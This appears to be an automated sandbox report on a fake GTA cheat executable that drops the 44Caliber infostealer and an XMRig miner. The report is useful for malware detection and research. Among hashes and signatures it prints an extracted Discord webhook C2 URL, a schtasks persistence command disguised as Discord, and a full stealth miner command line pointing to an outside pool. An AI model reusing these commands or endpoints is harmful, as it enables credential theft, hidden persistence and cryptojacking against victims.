Overview

overview

10

Static

static

3

7a154ab401...87.exe

windows7-x64

10

7a154ab401...87.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    148s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 01:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7a154ab401c900bec51004c09941526f164eac0c97eb787030c768175957be87.exe

  • Size

    5.0MB

  • MD5

    46da75a26b19ac079ac537df27812f55

  • SHA1

    7ab3ebd563f09227daa95d45b25fc026105e8d43

  • SHA256

    7a154ab401c900bec51004c09941526f164eac0c97eb787030c768175957be87

  • SHA512

    33673daaec68ebef0723a9a1f840441da95d7d2a008aac608c784e398779e6a4a8f5730d0f0a7696ed08b48b6c3d74f2fc2a7f38484f89cd32b2eb26229562f8

  • SSDEEP

    98304:g3GjDdIVl8LhRqb8ilx8hdrHjIhwxocDbUZBpgpK0/v4bY4tBNpQ3zv:g3GjpIT8LhRfbnrUhkbUZwt/vsBNpC

Score
10/10
44caliberxmrigminerspywarestealer

Malware Config

Extracted

Family

44caliber

C2

https://ptb.discord.com/api/webhooks/1239364029244375071/mrn0rnvQsz0hP9WRY2zgSh8tpZjJuQUgSXwIwHvE-X3LUDAJxPRfGOKBwBADMBj39VKy

Signatures

  • 44Caliber

    An open source infostealer written in C#.

    stealer44caliber
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects executables referencing Discord tokens regular expressions 2 IoCs
  • Detects executables referencing credit card regular expressions 2 IoCs
  • Detects executables referencing many VPN software clients. Observed in infosteslers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • XMRig Miner payload 19 IoCs
    miner
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\7a154ab401c900bec51004c09941526f164eac0c97eb787030c768175957be87.exe
    "C:\Users\Admin\AppData\Local\Temp\7a154ab401c900bec51004c09941526f164eac0c97eb787030c768175957be87.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat" "
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatGtaMoney.exe
        CheatGtaMoney.exe -p12345
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2584
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Cheat1.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Cheat1.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2636
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Cheat1.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\System32\cmd.exe
              "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1268
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
                7⤵
                • Creates scheduled task(s)
                PID:2736
            • C:\Windows\System32\cmd.exe
              "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1676
              • C:\Users\Admin\AppData\Local\Temp\Discord.exe
                C:\Users\Admin\AppData\Local\Temp\Discord.exe
                7⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:3024
                • C:\Windows\System32\conhost.exe
                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Discord.exe"
                  8⤵
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2108
                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                    9⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:336
                    • C:\Windows\System32\conhost.exe
                      "C:\Windows\System32\conhost.exe" "/sihost64"
                      10⤵
                        PID:1828
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=7201279 --pass=Cheat --cpu-max-threads-hint=50 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
                      9⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:896
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Midnight.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX1\Midnight.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2460
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2460 -s 1204
              5⤵
                PID:776

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\CheatGtaMoney.exe
        Filesize

        4.8MB

        MD5

        dc807927ced6c64280b41fbe25c8cd69

        SHA1

        26e8fceb928c61634e80af948d081f42c6d729f5

        SHA256

        9a323c74544544093d434730932dac056633ade3ba80b339dbb9b0700347f2e6

        SHA512

        a50474fd48d9af14d3e58cf93a3d6026384ce47f08ef2c7adba61060cda0aebd498e1f1fa39a7c03de83604e70823de379d61c719ed1590bc3f85b5929086535

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\start.bat
        Filesize

        42B

        MD5

        084d06c73d3444b46a1f49a0436e23e2

        SHA1

        74b6abceb89f7126a9661b8b57a090c660bb097e

        SHA256

        0d5e94ee28a9450af1b66669291a1f9ac60026f223ecc64acb3430954ce4c899

        SHA512

        d6908c1d06c64856d528f907804b77ae02024702ba8eac6583dbc284013f1e90e0bf5830f62a0641df62bd5310b4e4620e0a5c128a62673eb1f0f47b0476a49d

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RarSFX1\Midnight.exe
        Filesize

        303KB

        MD5

        f80513b43523603b69ab94be37708772

        SHA1

        942117fd4a9000dbeb8c42618ed3319dc97f9920

        SHA256

        7123cd4648ece02f06576c96c9862404c20f83e1e5bc8505a7148dc618d9dcd8

        SHA512

        1cb14391ffad0fa71dd2cf39ff93846ce1dd6305aa76ce1e0545fe11155af93136a6bf79bc4dec50f400f1417d3222c16f08e8d37689eaaa0fd8dc2dbff15a53

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        Filesize

        31KB

        MD5

        99f6ddfde83c4a40084b29ec309336c7

        SHA1

        7246f470c153a8c107fb4ff153da01f76c14db8e

        SHA256

        37773977416a09ae07d05dda3ecf488bba262436cd59a161f8189aeac5a35c81

        SHA512

        c488d00bf7678d4c28b392ddf8749cdef8875b0e451c4e7d1dcf214acbd15bfc2d71d6514c3e122a2dd7fc91aee9d4257d4551eeb12983a2858c14c8ddf23b95

        Download Submit

      • \Users\Admin\AppData\Local\Temp\RarSFX1\Cheat1.exe
        Filesize

        2.1MB

        MD5

        7ced67a2b06d542de8884bd8ef3388c8

        SHA1

        c2892cb614be03ec39988f9eb1ee5a60dfa74fe4

        SHA256

        19b5505a570061e49819101533505d29bc37d74588b4fec9334e836ea5199ea8

        SHA512

        0303874a789e678861d0b3501b07ac67ad5d0fc69c6607093e59775d142d17e9171a8b66ae88b6a45bed5b0f4373d6897a6b631e8f3f04bc9cb64daebe0e7b40

        Download Submit

      • memory/896-108-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

        Filesize

        4KB

        Download

      • memory/896-100-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-120-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-92-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-88-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-84-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-112-0x00000000000E0000-0x0000000000100000-memory.dmp

        Filesize

        128KB

        Download

      • memory/896-90-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-86-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-111-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-109-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-119-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-106-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-104-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-102-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-118-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-98-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-113-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-115-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-117-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-114-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-116-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-96-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/896-94-0x0000000140000000-0x0000000140786000-memory.dmp

        Filesize

        7.5MB

        Download

      • memory/1828-122-0x00000000000A0000-0x00000000000A6000-memory.dmp

        Filesize

        24KB

        Download

      • memory/1828-123-0x00000000002A0000-0x00000000002A6000-memory.dmp

        Filesize

        24KB

        Download

      • memory/2460-47-0x00000000002E0000-0x0000000000332000-memory.dmp

        Filesize

        328KB

        Download

      • memory/2616-48-0x000000001B470000-0x000000001B690000-memory.dmp

        Filesize

        2.1MB

        Download

      • memory/2616-37-0x00000000000F0000-0x0000000000310000-memory.dmp

        Filesize

        2.1MB

        Download